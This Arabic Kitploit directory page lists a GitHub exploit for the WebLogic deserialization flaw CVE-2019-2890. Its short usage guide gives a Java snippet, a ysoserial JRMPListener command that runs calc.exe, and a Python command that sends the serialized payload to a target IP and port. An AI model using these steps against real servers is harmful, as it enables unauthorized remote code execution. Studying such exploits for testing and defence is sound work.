Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-2890 — 0-sec.org | Kitploit
أدوات/GitHubGitHub/ianxtianxt/cve-2019-2890
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالقيادة والسيطرةأداة الوصول عن بعد
GitHubianxtianxt/cve-2019-2890

CVE-2019-2890

0-sec.org

عرض المستودع
42منذ 6 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إعلان

يُستخدم فقط لأغراض التعلم والتبادل، وتتحمل وحدك مسؤولية أي استخدام آخر.

شرح

تم استيراد ملفات jar ذات الصلة إلى المشروع، ويتم استخدام أسلوب الاستغلال yso's JRMP، ويمكن تعديل أسلوب الاستغلال أثناء التعلم والتصحيح.

أولاً، يجب وضع ملف SerializedSystemIni.dat من weblogic في مجلد security.

ثم يجب إعادة تسمية yso إلى ysoserial.jar واستيرادها إلى دليل lib.

1

ثانيًا، عنوان IP والمنفذ في getObject في ملف weblogic/wsee/jaxws/persistence/PersistentContext.java.

root@kitploit:~
        try {
            var3.writeObject(Poc.getObject("127.0.0.1:8000"));
        } catch (Exception e) {
            e.printStackTrace();
        }

أخيرًا، عن بعد عبر استماع JRMP، استخدم الأمر 7u21 للتنفيذ.

root@kitploit:~
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "calc.exe"

طريقة الاستخدام: قم بتشغيل Poc.java لإنشاء ملف التسلسل poc.ser، ثم عبر

root@kitploit:~
python weblogic.py ip port poc.ser

1

1

تنزيل الأداة